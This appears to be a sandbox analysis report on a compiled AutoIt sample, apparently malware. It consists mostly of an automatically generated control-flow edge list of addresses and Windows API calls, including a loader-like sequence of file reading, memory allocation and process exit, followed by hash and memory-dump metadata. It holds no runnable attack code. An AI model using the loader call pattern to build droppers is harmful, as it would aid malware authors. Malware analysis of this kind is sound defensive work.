LeaveCriticalSection 94737->94738 94738->94739 94739->94723 94744 8042f6 94740->94744 94743 8042cc LoadLibraryA GetProcAddress 94743->94620 94745 8042aa 94744->94745 94746 8042ff LoadLibraryA 94744->94746 94745->94620 94745->94743 94746->94745 94747 804310 GetProcAddress 94746->94747 94747->94745 94749 81f4ea 48 API calls 94748->94749 94750 8047c9 94749->94750 94750->94625 94752 804085 FindResourceExW 94751->94752 94756 8040a2 94751->94756 94753 874f16 LoadResource 94752->94753 94752->94756 94754 874f2b SizeofResource 94753->94754 94753->94756 94755 874f3f LockResource 94754->94755 94754->94756 94755->94756 94756->94626 94758 804526 94757->94758 94761 874fe0 94757->94761 94763 823a8d 94758->94763 94760 804534 94760->94636 94762->94626 94764 823a99 __getstream 94763->94764 94765 823aa7 94764->94765 94767 823acd 94764->94767 94776 827c0e 47 API calls __getptd_noexit 94765->94776 94769 824e1c __lock_file 48 API calls 94767->94769 94768 823aac 94777 826e10 8 API calls ___wstrgtold12_l 94768->94777 94771 823ad3 94769->94771 94778 8239fe 81 API calls 4 library calls 94771->94778 94773 823ae2 94779 823b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94773->94779 94775 823ab7 __getstream 94775->94760 94776->94768 94777->94775 94778->94773 94779->94775 94783 823839 94780->94783 94782 804510 94782->94645 94784 823845 __getstream 94783->94784 94785 823888 94784->94785 94786 823880 __getstream 94784->94786 94788 82385b _memset 94784->94788 94787 824e1c __lock_file 48 API calls 94785->94787 94786->94782 94789 82388e 94787->94789 94796 827c0e 47 API calls __getptd_noexit 94788->94796 94798 82365b 62 API calls 6 library calls 94789->94798 94791 823875 94797 826e10 8 API calls ___wstrgtold12_l 94791->94797 94794 8238a4 94799 8238c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94794->94799 94796->94791 94797->94786 94798->94794 94799->94786 94803 82344a GetSystemTimeAsFileTime 94800->94803 94802 84bdc3 94802->94647 94804 823478 __aulldiv 94803->94804 94804->94802 94806 
823e71 __getstream 94805->94806 94807 823e94 94806->94807 94808 823e7f 94806->94808 94810 824e1c __lock_file 48 API calls 94807->94810 94819 827c0e 47 API calls __getptd_noexit 94808->94819 94812 823e9a 94810->94812 94811 823e84 94820 826e10 8 API calls ___wstrgtold12_l 94811->94820 94821 823b0c 55 API calls 4 library calls 94812->94821 94815 823ea5 94822 823ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94815->94822 94817 823eb7 94818 823e8f __getstream 94817->94818 94818->94652 94819->94811 94820->94818 94821->94815 94822->94817 94824 821e61 94823->94824 94825 821e55 94823->94825 94847 827c0e 47 API calls __getptd_noexit 94824->94847 94825->94824 94838 821ed4 94825->94838 94842 829d6b 47 API calls ___wstrgtold12_l 94825->94842 94827 822019 94831 821e41 94827->94831 94848 826e10 8 API calls ___wstrgtold12_l 94827->94848 94830 821fa0 94830->94824 94830->94831 94833 821fb0 94830->94833 94831->94156 94832 821f5f 94832->94824 94834 821f7b 94832->94834 94844 829d6b 47 API calls ___wstrgtold12_l 94832->94844 94846 829d6b 47 API calls ___wstrgtold12_l 94833->94846 94834->94824 94834->94831 94837 821f91 94834->94837 94845 829d6b 47 API calls ___wstrgtold12_l 94837->94845 94838->94824 94841 821f41 94838->94841 94843 829d6b 47 API calls ___wstrgtold12_l 94838->94843 94841->94830 94841->94832 94842->94838 94843->94841 94844->94834 94845->94831 94846->94831 94847->94827 94848->94831 94849->94586 94851 822aba __getstream 94850->94851 94852 822ae4 __getstream 94851->94852 94853 822ad4 94851->94853 94854 822aec 94851->94854 94852->94594 94885 827c0e 47 API calls __getptd_noexit 94853->94885 94856 824e1c __lock_file 48 API calls 94854->94856 94857 822af2 94856->94857 94873 822957 94857->94873 94858 822ad9 94886 826e10 8 API calls ___wstrgtold12_l 94858->94886 94864 84c715 94863->94864 94865 84c6ff SetFileTime CloseHandle 94863->94865 94864->94568 94865->94864 94869 84c581 __tzset_nolock _wcscmp 94866->94869 94867 84bf5a GetSystemTimeAsFileTime 94867->94869 94868 84c05f 
94868->94564 94868->94568 94869->94867 94869->94868 94870 8044ed 64 API calls 94869->94870 94871 804517 83 API calls 94869->94871 94870->94869 94871->94869 94872->94593 94876 822966 94873->94876 94879 822984 94873->94879 94874 822974 94888 827c0e 47 API calls __getptd_noexit 94874->94888 94876->94874 94876->94879 94883 82299c ___crtGetEnvironmentStringsW 94876->94883 94877 822979 94889 826e10 8 API calls ___wstrgtold12_l 94877->94889 94887 822b24 LeaveCriticalSection LeaveCriticalSection _fprintf 94879->94887 94881 822c84 __flush 78 API calls 94881->94883 94882 822933 __fflush_nolock 47 API calls 94882->94883 94883->94879 94883->94881 94883->94882 94884 82af61 __flswbuf 78 API calls 94883->94884 94890 828e63 78 API calls 5 library calls 94883->94890 94884->94883 94885->94858 94886->94852 94887->94852 94888->94877 94889->94879 94890->94883 94920 806b0f 94891->94920 94893 80b69b 94932 80ba85 48 API calls ___crtGetEnvironmentStringsW 94893->94932 94895 80b6b5 Mailbox 94895->94176 94898 87397b 94939 8426bc 88 API calls 4 library calls 94898->94939 94899 80ba85 48 API calls 94912 80b495 94899->94912 94902 80b9e4 94941 8426bc 88 API calls 4 library calls 94902->94941 94903 873973 94903->94895 94906 80bcce 48 API calls 94906->94912 94907 873989 94940 80ba85 48 API calls ___crtGetEnvironmentStringsW 94907->94940 94909 873909 94935 806b4a 94909->94935 94912->94893 94912->94898 94912->94899 94912->94902 94912->94906 94912->94909 94915 80bdfa 48 API calls 94912->94915 94918 873939 ___crtGetEnvironmentStringsW 94912->94918 94925 80c413 59 API calls 94912->94925 94926 80bb85 94912->94926 94931 80bc74 48 API calls 94912->94931 94933 80c6a5 49 API calls 94912->94933 94934 80c799 48 API calls ___crtGetEnvironmentStringsW 94912->94934 94914 873914 94917 81f4ea 48 API calls 94914->94917 94916 80b66c CharUpperBuffW 94915->94916 94916->94912 94917->94918 94938 8426bc 88 API calls 4 library calls 94918->94938 94919->94180 94921 81f4ea 48 API calls 94920->94921 94922 806b34 94921->94922 
94923 806b4a 48 API calls 94922->94923 94924 806b43 94923->94924 94924->94912 94925->94912 94927 80bb9b 94926->94927 94930 80bb96 ___crtGetEnvironmentStringsW 94926->94930 94928 81ee75 48 API calls 94927->94928 94929 871b77 94927->94929 94928->94930 94930->94912 94931->94912 94932->94895 94933->94912 94934->94912 94936 81f4ea 48 API calls 94935->94936 94937 806b54 94936->94937 94937->94914 94938->94903 94939->94907 94940->94903 94941->94903 94943 846529 94942->94943 94944 846cc4 FindFirstFileW 94942->94944 94943->94000 94944->94943 94945 846cd9 FindClose 94944->94945 94945->94943 94947 811d2a 94946->94947 94951 811ed6 94946->94951 94948 812357 94947->94948 94947->94951 94952 811e0b 94947->94952 94953 811eba 94947->94953 94948->94953 94969 849f44 58 API calls wcstoxq 94948->94969 94949 811f55 94949->94953 94957 811e9a Mailbox 94949->94957 94967 8397ed InterlockedDecrement 94949->94967 94951->94948 94951->94949 94951->94953 94951->94957 94952->94949 94952->94953 94954 811e47 94952->94954 94953->94064 94954->94953 94956 87bfc4 94954->94956 94954->94957 94966 82203b 58 API calls __wtof_l 94956->94966 94957->94953 94968 82203b 58 API calls __wtof_l 94957->94968 94960->94064 94961->94065 94962->94065 94963->94058 94964->94052 94965->94066 94966->94953 94967->94957 94968->94953 94969->94953 94970->93892 94971->93892 94972->93886 94973->93901 94974->93905 94975 803742 94976 80374b 94975->94976 94977 8037c8 94976->94977 94978 803769 94976->94978 95016 8037c6 94976->95016 94980 871e00 94977->94980 94981 8037ce 94977->94981 94982 803776 94978->94982 94983 80382c PostQuitMessage 94978->94983 94979 8037ab DefWindowProcW 95005 8037b9 94979->95005 95030 802ff6 16 API calls 94980->95030 94984 8037d3 94981->94984 94985 8037f6 SetTimer RegisterWindowMessageW 94981->94985 94987 803781 94982->94987 94988 871e88 94982->94988 94983->95005 94993 871da3 94984->94993 94994 8037da KillTimer 94984->94994 94989 80381f CreatePopupMenu 94985->94989 94985->95005 94990 803836 94987->94990 94991 
803789 94987->94991 95045 844ddd 60 API calls _memset 94988->95045 94989->95005 95020 81eb83 94990->95020 94997 803794 94991->94997 95009 871e6d 94991->95009 94999 871ddc MoveWindow 94993->94999 95000 871da8 94993->95000 95027 803847 Shell_NotifyIconW _memset 94994->95027 94995 871e27 95031 81e312 331 API calls Mailbox 94995->95031 95002 871e58 94997->95002 95003 80379f 94997->95003 94999->95005 95006 871dac 95000->95006 95007 871dcb SetFocus 95000->95007 95043 8455bd 70 API calls _memset 95002->95043 95003->94979 95032 803847 Shell_NotifyIconW _memset 95003->95032 95004 871e9a 95004->94979 95004->95005 95006->95003 95010 871db5 95006->95010 95007->95005 95008 8037ed 95028 80390f DeleteObject DestroyWindow Mailbox 95008->95028 95009->94979 95044 83a5f3 48 API calls 95009->95044 95029 802ff6 16 API calls 95010->95029 95015 871e68 95015->95005 95016->94979 95018 871e4c 95033 804ffc 95018->95033 95021 81eb9a _memset 95020->95021 95022 81ec1c 95020->95022 95046 8051af 95021->95046 95022->95005 95024 81ec05 KillTimer SetTimer 95024->95022 95025 873c7a Shell_NotifyIconW 95025->95024 95026 81ebc1 95026->95024 95026->95025 95027->95008 95028->95005 95029->95005 95030->94995 95031->95003 95032->95018 95034 805027 _memset 95033->95034 95123 804c30 95034->95123 95038 8050ca Shell_NotifyIconW 95040 8051af 50 API calls 95038->95040 95039 873d28 Shell_NotifyIconW 95041 8050df 95040->95041 95041->95016 95042 8050ac 95042->95038 95042->95039 95043->95015 95044->95016 95045->95004 95047 8051cb 95046->95047 95067 8052a2 Mailbox 95046->95067 95048 806b0f 48 API calls 95047->95048 95049 8051d9 95048->95049 95050 873ca1 LoadStringW 95049->95050 95051 8051e6 95049->95051 95054 873cbb 95050->95054 95068 806a63 95051->95068 95053 8051fb 95053->95054 95055 80520c 95053->95055 95056 80510d 48 API calls 95054->95056 95057 805216 95055->95057 95058 8052a7 95055->95058 95061 873cc5 95056->95061 95079 80510d 95057->95079 95059 806eed 48 API calls 95058->95059 95064 805220 _memset _wcscpy 
95059->95064 95061->95064 95088 80518c 95061->95088 95063 873ce7 95065 80518c 48 API calls 95063->95065 95066 805288 Shell_NotifyIconW 95064->95066 95065->95064 95066->95067 95067->95026 95069 806adf 95068->95069 95072 806a6f __NMSG_WRITE 95068->95072 95099 80b18b 95069->95099 95071 806ab6 ___crtGetEnvironmentStringsW 95071->95053 95073 806ad7 95072->95073 95074 806a8b 95072->95074 95098 80c369 48 API calls 95073->95098 95076 806b4a 48 API calls 95074->95076 95077 806a95 95076->95077 95078 81ee75 48 API calls 95077->95078 95078->95071 95080 871be7 95079->95080 95081 80511f 95079->95081 95112 83a58f 48 API calls ___crtGetEnvironmentStringsW 95080->95112 95103 80b384 95081->95103 95084 871bf1 95086 806eed 48 API calls 95084->95086 95085 80512b 95085->95064 95087 871bf9 Mailbox 95086->95087 95089 805197 95088->95089 95090 871ace 95089->95090 95091 80519f 95089->95091 95092 806b4a 48 API calls 95090->95092 95113 805130 95091->95113 95094 871adb __NMSG_WRITE 95092->95094 95096 81ee75 48 API calls 95094->95096 95095 8051aa 95095->95063 95097 871b07 ___crtGetEnvironmentStringsW 95096->95097 95098->95071 95100 80b1a2 ___crtGetEnvironmentStringsW 95099->95100 95101 80b199 95099->95101 95100->95071 95101->95100 95102 80bdfa 48 API calls 95101->95102 95102->95100 95104 80b3c5 ___crtGetEnvironmentStringsW 95103->95104 95105 80b392 95103->95105 95104->95085 95104->95104 95105->95104 95106 80b3b8 95105->95106 95107 80b3fd 95105->95107 95109 80bb85 48 API calls 95106->95109 95108 81f4ea 48 API calls 95107->95108 95110 80b407 95108->95110 95109->95104 95111 81f4ea 48 API calls 95110->95111 95111->95104 95112->95084 95114 80513f __NMSG_WRITE 95113->95114 95115 871b27 95114->95115 95116 805151 95114->95116 95117 806b4a 48 API calls 95115->95117 95118 80bb85 48 API calls 95116->95118 95120 871b34 95117->95120 95119 80515e ___crtGetEnvironmentStringsW 95118->95119 95119->95095 95121 81ee75 48 API calls 95120->95121 95122 871b57 ___crtGetEnvironmentStringsW 95121->95122 95124 873c33 
95123->95124 95125 804c44 95123->95125 95124->95125 95126 873c3c DestroyIcon 95124->95126 95125->95042 95127 845819 61 API calls _W_store_winword 95125->95127 95126->95125 95127->95042 95128 8719dd 95133 804a30 95128->95133 95130 8719f1 95153 820f0a 52 API calls __cinit 95130->95153 95132 8719fb 95134 804a40 __ftell_nolock 95133->95134 95135 80d7f7 48 API calls 95134->95135 95136 804af6 95135->95136 95154 805374 95136->95154 95138 804aff 95161 80363c 95138->95161 95141 80518c 48 API calls 95142 804b18 95141->95142 95167 8064cf 95142->95167 95145 80d7f7 48 API calls 95146 804b32 95145->95146 95173 8049fb 95146->95173 95148 804b43 Mailbox 95148->95130 95149 8061a6 48 API calls 95152 804b3d _wcscat Mailbox __NMSG_WRITE 95149->95152 95150 80ce19 48 API calls 95150->95152 95151 8064cf 48 API calls 95151->95152 95152->95148 95152->95149 95152->95150 95152->95151 95153->95132 95187 82f8a0 95154->95187 95157 80ce19 48 API calls 95158 8053a7 95157->95158 95189 80660f 95158->95189 95160 8053b1 Mailbox 95160->95138 95162 803649 __ftell_nolock 95161->95162 95200 80366c GetFullPathNameW 95162->95200 95164 80365a 95165 806a63 48 API calls 95164->95165 95166 803669 95165->95166 95166->95141 95168 80651b 95167->95168 95172 8064dd ___crtGetEnvironmentStringsW 95167->95172 95171 81f4ea 48 API calls 95168->95171 95169 81f4ea 48 API calls 95170 804b29 95169->95170 95170->95145 95171->95172 95172->95169 95202 80bcce 95173->95202 95176 8741cc RegQueryValueExW 95178 874246 RegCloseKey 95176->95178 95179 8741e5 95176->95179 95177 804a2b 95177->95152 95180 81f4ea 48 API calls 95179->95180 95181 8741fe 95180->95181 95182 8047b7 48 API calls 95181->95182 95183 874208 RegQueryValueExW 95182->95183 95184 874224 95183->95184 95185 87423b 95183->95185 95186 806a63 48 API calls 95184->95186 95185->95178 95186->95185 95188 805381 GetModuleFileNameW 95187->95188 95188->95157 95190 82f8a0 __ftell_nolock 95189->95190 95191 80661c GetFullPathNameW 95190->95191 95192 806a63 48 API calls 95191->95192 
95193 806643 95192->95193 95196 806571 95193->95196 95197 80657f 95196->95197 95198 80b18b 48 API calls 95197->95198 95199 80658f 95198->95199 95199->95160 95201 80368a 95200->95201 95201->95164 95203 80bce8 95202->95203 95207 804a0a RegOpenKeyExW 95202->95207 95204 81f4ea 48 API calls 95203->95204 95205 80bcf2 95204->95205 95206 81ee75 48 API calls 95205->95206 95206->95207 95207->95176 95207->95177 95208 81221a 95209 81271e 95208->95209 95210 812223 95208->95210 95218 811eba Mailbox 95209->95218 95219 83a58f 48 API calls ___crtGetEnvironmentStringsW 95209->95219 95210->95209 95211 80936c 81 API calls 95210->95211 95212 81224e 95211->95212 95212->95209 95213 81225e 95212->95213 95215 80b384 48 API calls 95213->95215 95215->95218 95216 87be8a 95217 806eed 48 API calls 95216->95217 95217->95218 95219->95216 95220 879bec 95225 810ae0 Mailbox ___crtGetEnvironmentStringsW 95220->95225 95221 80ffe1 Mailbox 95223 81f4ea 48 API calls 95223->95225 95224 811526 Mailbox 95276 84cc5c 86 API calls 4 library calls 95224->95276 95225->95221 95225->95223 95225->95224 95247 80ce19 48 API calls 95225->95247 95250 80fec8 95225->95250 95256 80fe30 331 API calls 95225->95256 95257 87a706 95225->95257 95259 8397ed InterlockedDecrement 95225->95259 95260 856ff0 331 API calls 95225->95260 95263 860d1d 95225->95263 95266 860d09 95225->95266 95270 85ef61 82 API calls 2 library calls 95225->95270 95271 85f0ac 90 API calls Mailbox 95225->95271 95272 84a6ef 48 API calls 95225->95272 95273 85e822 331 API calls Mailbox 95225->95273 95228 81f4ea 48 API calls 95228->95250 95230 811d10 59 API calls 95230->95250 95232 806eed 48 API calls 95232->95250 95233 81146e 95239 806eed 48 API calls 95233->95239 95234 810509 95279 84cc5c 86 API calls 4 library calls 95234->95279 95235 87a922 95236 811473 95278 84cc5c 86 API calls 4 library calls 95236->95278 95237 87a246 95241 806eed 48 API calls 95237->95241 95239->95221 95241->95221 95243 8397ed InterlockedDecrement 95243->95250 95244 87a873 95245 87a30e 
95245->95221 95274 8397ed InterlockedDecrement 95245->95274 95246 80d7f7 48 API calls 95246->95250 95247->95225 95249 87a973 95280 84cc5c 86 API calls 4 library calls 95249->95280 95250->95221 95250->95228 95250->95230 95250->95232 95250->95233 95250->95234 95250->95236 95250->95237 95250->95243 95250->95245 95250->95246 95250->95249 95251 820f0a 52 API calls __cinit 95250->95251 95255 8115b5 95250->95255 95269 811820 331 API calls 2 library calls 95250->95269 95251->95250 95253 87a982 95277 84cc5c 86 API calls 4 library calls 95255->95277 95256->95225 95275 84cc5c 86 API calls 4 library calls 95257->95275 95259->95225 95260->95225 95281 85f8ae 95263->95281 95265 860d2d 95265->95225 95267 85f8ae 129 API calls 95266->95267 95268 860d19 95267->95268 95268->95225 95269->95250 95270->95225 95271->95225 95272->95225 95273->95225 95274->95221 95275->95224 95276->95221 95277->95221 95278->95244 95279->95235 95280->95253 95282 80936c 81 API calls 95281->95282 95283 85f8ea 95282->95283 95308 85f92c Mailbox 95283->95308 95317 860567 95283->95317 95285 85fb8b 95286 85fcfa 95285->95286 95290 85fb95 95285->95290 95364 860688 89 API calls Mailbox 95286->95364 95289 85fd07 95289->95290 95291 85fd13 95289->95291 95330 85f70a 95290->95330 95291->95308 95292 80936c 81 API calls 95310 85f984 Mailbox 95292->95310 95297 85fbc9 95344 81ed18 95297->95344 95300 85fbe3 95350 84cc5c 86 API calls 4 library calls 95300->95350 95301 85fbfd 95351 81c050 95301->95351 95304 85fbee GetCurrentProcess TerminateProcess 95304->95301 95305 85fc14 95306 811b90 48 API calls 95305->95306 95315 85fc3e 95305->95315 95309 85fc2d 95306->95309 95307 85fd65 95307->95308 95313 85fd7e FreeLibrary 95307->95313 95308->95265 95362 86040f 105 API calls _free 95309->95362 95310->95285 95310->95292 95310->95308 95310->95310 95348 8629e8 48 API calls ___crtGetEnvironmentStringsW 95310->95348 95349 85fda5 60 API calls 2 library calls 95310->95349 95312 811b90 48 API calls 95312->95315 95313->95308 95315->95307 
95315->95312 95363 80dcae 50 API calls Mailbox 95315->95363 95365 86040f 105 API calls _free 95315->95365 95318 80bdfa 48 API calls 95317->95318 95319 860582 CharLowerBuffW 95318->95319 95366 841f11 95319->95366 95323 80d7f7 48 API calls 95324 8605bb 95323->95324 95373 8069e9 48 API calls ___crtGetEnvironmentStringsW 95324->95373 95326 8605d2 95328 80b18b 48 API calls 95326->95328 95327 86061a Mailbox 95327->95310 95329 8605de Mailbox 95328->95329 95329->95327 95374 85fda5 60 API calls 2 library calls 95329->95374 95331 85f725 95330->95331 95335 85f77a 95330->95335 95332 81f4ea 48 API calls 95331->95332 95333 85f747 95332->95333 95334 81f4ea 48 API calls 95333->95334 95333->95335 95334->95333 95336 860828 95335->95336 95337 860a53 Mailbox 95336->95337 95340 86084b _strcat _wcscpy __NMSG_WRITE 95336->95340 95337->95297 95338 80cf93 58 API calls 95338->95340 95339 80d286 48 API calls 95339->95340 95340->95337 95340->95338 95340->95339 95341 82395c 47 API calls __malloc_crt 95340->95341 95342 80936c 81 API calls 95340->95342 95377 848035 50 API calls __NMSG_WRITE 95340->95377 95341->95340 95342->95340 95345 81ed2d 95344->95345 95346 81edc5 VirtualProtect 95345->95346 95347 81ed93 95345->95347 95346->95347 95347->95300 95347->95301 95348->95310 95349->95310 95350->95304 95352 81c064 95351->95352 95354 81c069 Mailbox 95351->95354 95378 81c1af 48 API calls 95352->95378 95359 81c077 95354->95359 95379 81c15c 48 API calls 95354->95379 95356 81f4ea 48 API calls 95358 81c108 95356->95358 95357 81c152 95357->95305 95360 81f4ea 48 API calls 95358->95360 95359->95356 95359->95357 95361 81c113 95360->95361 95361->95305 95361->95361 95362->95315 95363->95315 95364->95289 95365->95315 95367 841f3b __NMSG_WRITE 95366->95367 95368 841f79 95367->95368 95370 841f6f 95367->95370 95371 841ffa 95367->95371 95368->95323 95368->95329 95370->95368 95375 81d37a 60 API calls 95370->95375 95371->95368 95376 81d37a 60 API calls 95371->95376 95373->95326 95374->95327 95375->95370 95376->95371 
95377->95340 95378->95354 95379->95359 95380 11b2ed0 95394 11b0b20 95380->95394 95382 11b2f86 95397 11b2dc0 95382->95397 95384 11b2faf CreateFileW 95386 11b3003 95384->95386 95389 11b2ffe 95384->95389 95387 11b301a VirtualAlloc 95386->95387 95386->95389 95388 11b3038 ReadFile 95387->95388 95387->95389 95388->95389 95390 11b3053 95388->95390 95391 11b1dc0 13 API calls 95390->95391 95392 11b3086 95391->95392 95393 11b30a9 ExitProcess 95392->95393 95393->95389 95400 11b3fb0 GetPEB 95394->95400 95396 11b11ab 95396->95382 95398 11b2dc9 Sleep 95397->95398 95399 11b2dd7 95398->95399 95401 11b3fda 95400->95401 95401->95396 95402 8719cb 95407 802322 95402->95407 95404 8719d1 95440 820f0a 52 API calls __cinit 95404->95440 95406 8719db 95408 802344 95407->95408 95441 8026df 95408->95441 95413 80d7f7 48 API calls 95414 802384 95413->95414 95415 80d7f7 48 API calls 95414->95415 95416 80238e 95415->95416 95417 80d7f7 48 API calls 95416->95417 95418 802398 95417->95418 95419 80d7f7 48 API calls 95418->95419 95420 8023de 95419->95420 95421 80d7f7 48 API calls 95420->95421 95422 8024c1 95421->95422 95449 80263f 95422->95449 95426 8024f1 95427 80d7f7 48 API calls 95426->95427 95428 8024fb 95427->95428 95478 802745 95428->95478 95430 802546 95431 802556 GetStdHandle 95430->95431 95432 8025b1 95431->95432 95433 87501d 95431->95433 95434 8025b7 CoInitialize 95432->95434 95433->95432 95435 875026 95433->95435 95434->95404 95485 8492d4 53 API calls 95435->95485 95437 87502d 95486 8499f9 CreateThread 95437->95486 95439 875039 CloseHandle 95439->95434 95440->95406 95487 802854 95441->95487 95444 806a63 48 API calls 95445 80234a 95444->95445 95446 80272e 95445->95446 95501 8027ec 6 API calls 95446->95501 95448 80237a 95448->95413 95450 80d7f7 48 API calls 95449->95450 95451 80264f 95450->95451 95452 80d7f7 48 API calls 95451->95452 95453 802657 95452->95453 95502 8026a7 95453->95502 95456 8026a7 48 API calls 95457 802667 95456->95457 95458 80d7f7 48 API calls 95457->95458 95459 802672 
95458->95459 95460 81f4ea 48 API calls 95459->95460 95461 8024cb 95460->95461 95462 8022a4 95461->95462 95463 8022b2 95462->95463 95464 80d7f7 48 API calls 95463->95464 95465 8022bd 95464->95465 95466 80d7f7 48 API calls 95465->95466 95467 8022c8 95466->95467 95468 80d7f7 48 API calls 95467->95468 95469 8022d3 95468->95469 95470 80d7f7 48 API calls 95469->95470 95471 8022de 95470->95471 95472 8026a7 48 API calls 95471->95472 95473 8022e9 95472->95473 95474 81f4ea 48 API calls 95473->95474 95475 8022f0 95474->95475 95476 871fe7 95475->95476 95477 8022f9 RegisterWindowMessageW 95475->95477 95477->95426 95479 802755 95478->95479 95480 875f4d 95478->95480 95481 81f4ea 48 API calls 95479->95481 95507 84c942 50 API calls 95480->95507 95484 80275d 95481->95484 95483 875f58 95484->95430 95485->95437 95486->95439 95508 8499df 54 API calls 95486->95508 95494 802870 95487->95494 95490 802870 48 API calls 95491 802864 95490->95491 95492 80d7f7 48 API calls 95491->95492 95493 802716 95492->95493 95493->95444 95495 80d7f7 48 API calls 95494->95495 95496 80287b 95495->95496 95497 80d7f7 48 API calls 95496->95497 95498 802883 95497->95498 95499 80d7f7 48 API calls 95498->95499 95500 80285c 95499->95500 95500->95490 95501->95448 95503 80d7f7 48 API calls 95502->95503 95504 8026b0 95503->95504 95505 80d7f7 48 API calls 95504->95505 95506 80265f 95505->95506 95506->95456 95507->95483 95509 87197b 95514 81dd94 95509->95514 95513 87198a 95515 81f4ea 48 API calls 95514->95515 95516 81dd9c 95515->95516 95517 81ddb0 95516->95517 95522 81df3d 95516->95522 95521 820f0a 52 API calls __cinit 95517->95521 95521->95513 95523 81df46 95522->95523 95524 81dda8 95522->95524 95554 820f0a 52 API calls __cinit 95523->95554 95526 81ddc0 95524->95526 95527 80d7f7 48 API calls 95526->95527 95528 81ddd7 GetVersionExW 95527->95528 95529 806a63 48 API calls 95528->95529 95530 81de1a 95529->95530 95555 81dfb4 95530->95555 95533 806571 48 API calls 95536 81de2e 95533->95536 95535 8724c8 95536->95535 95559 
81df77 95536->95559 95538 81dea4 GetCurrentProcess 95568 81df5f LoadLibraryA GetProcAddress 95538->95568 95539 81debb 95540 81df31 GetSystemInfo 95539->95540 95541 81dee3 95539->95541 95543 81df0e 95540->95543 95562 81e00c 95541->95562 95546 81df21 95543->95546 95547 81df1c FreeLibrary 95543->95547 95546->95517 95547->95546 95548 81df29 GetSystemInfo 95550 81df03 95548->95550 95549 81def9 95565 81dff4 95549->95565 95550->95543 95553 81df09 FreeLibrary 95550->95553 95553->95543 95554->95524 95556 81dfbd 95555->95556 95557 80b18b 48 API calls 95556->95557 95558 81de22 95557->95558 95558->95533 95569 81df89 95559->95569 95573 81e01e 95562->95573 95566 81e00c 2 API calls 95565->95566 95567 81df01 GetNativeSystemInfo 95566->95567 95567->95550 95568->95539 95570 81dea0 95569->95570 95571 81df92 LoadLibraryA 95569->95571 95570->95538 95570->95539 95571->95570 95572 81dfa3 GetProcAddress 95571->95572 95572->95570 95574 81def1 95573->95574 95575 81e027 LoadLibraryA 95573->95575 95574->95548 95574->95549 95575->95574 95576 81e038 GetProcAddress 95575->95576 95576->95574 95577 8719ba 95582 81c75a 95577->95582 95581 8719c9 95583 80d7f7 48 API calls 95582->95583 95584 81c7c8 95583->95584 95591 81d26c 95584->95591 95586 87ccc3 95588 81c865 95588->95586 95589 81c881 95588->95589 95594 81d1fa 48 API calls ___crtGetEnvironmentStringsW 95588->95594 95590 820f0a 52 API calls __cinit 95589->95590 95590->95581 95595 81d298 95591->95595 95594->95588 95596 81d28b 95595->95596 95597 81d2a5 95595->95597 95596->95588 95597->95596 95598 81d2ac RegOpenKeyExW 95597->95598 95598->95596 95599 81d2c6 RegQueryValueExW 95598->95599 95600 81d2fc RegCloseKey 95599->95600 95601 81d2e7 95599->95601 95600->95596 95601->95600 95602 878eb8 95606 84a635 95602->95606 95604 878ec3 95605 84a635 84 API calls 95604->95605 95605->95604 95612 84a66f 95606->95612 95613 84a642 95606->95613 95607 84a671 95618 81ec4e 81 API calls 95607->95618 95609 84a676 95610 80936c 81 API calls 95609->95610 95611 84a67d 
                                            Control-flow graph edge list (continuation of the preceding function's graph; the raw node/edge dump is not reproduced). Nodes in this dump reference the CRT startup path (GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, GetModuleFileNameW, TlsAlloc, InitializeCriticalSectionAndSpinCount, GetStdHandle, GetFileType, RtlAllocateHeap, IsDebuggerPresent, SetUnhandledExceptionFilter, TerminateProcess) and the AutoIt script startup path (IsThemeActive, SystemParametersInfoW, GetCurrentDirectoryW, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, GetOpenFileNameW, GetForegroundWindow, ShellExecuteW, AllocateAndInitializeSid, CheckTokenMembership, GetSystemTimeAsFileTime, GetLongPathNameW, SetFilePointerEx, ReadFile, CloseHandle, GetStringTypeW, EnumResourceNamesW, LoadImageW, RegisterClassExW).

                                            Control-flow Graph
                                            • Function at 0082B043 (basic blocks 82b043-82b86c); rendered graph and raw edge list not reproduced.
                                            • APIs referenced in the graph: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError.
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30e5756d09003d182592edd410640edd75c1f75834d5e857d63743b35418f2c6
                                            • Instruction ID: 9ab8697476285561240a70cbb5a329cb9f2724916d2738cc0b0687457389901d
                                            • Opcode Fuzzy Hash: 30e5756d09003d182592edd410640edd75c1f75834d5e857d63743b35418f2c6
                                            • Instruction Fuzzy Hash: CE324E75A122288FCB249F58EC85AE9B7B5FF46314F5840D9E40AE7A81D7309EC0CF52

                                            Control-flow Graph
                                            • Function at 00803D19; rendered graph not reproduced (see the APIs and Strings below for the calls it makes).
                                            APIs
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00803AA3,?), ref: 00803D45
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,00803AA3,?), ref: 00803D57
                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,008C1148,008C1130,?,?,?,?,00803AA3,?), ref: 00803DC8
                                              • Part of subcall function 00806430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00803DEE,008C1148,?,?,?,?,?,00803AA3,?), ref: 00806471
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,00803AA3,?), ref: 00803E48
                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008B28F4,00000010), ref: 00871CCE
                                            • SetCurrentDirectoryW.KERNEL32(?,008C1148,?,?,?,?,?,00803AA3,?), ref: 00871D06
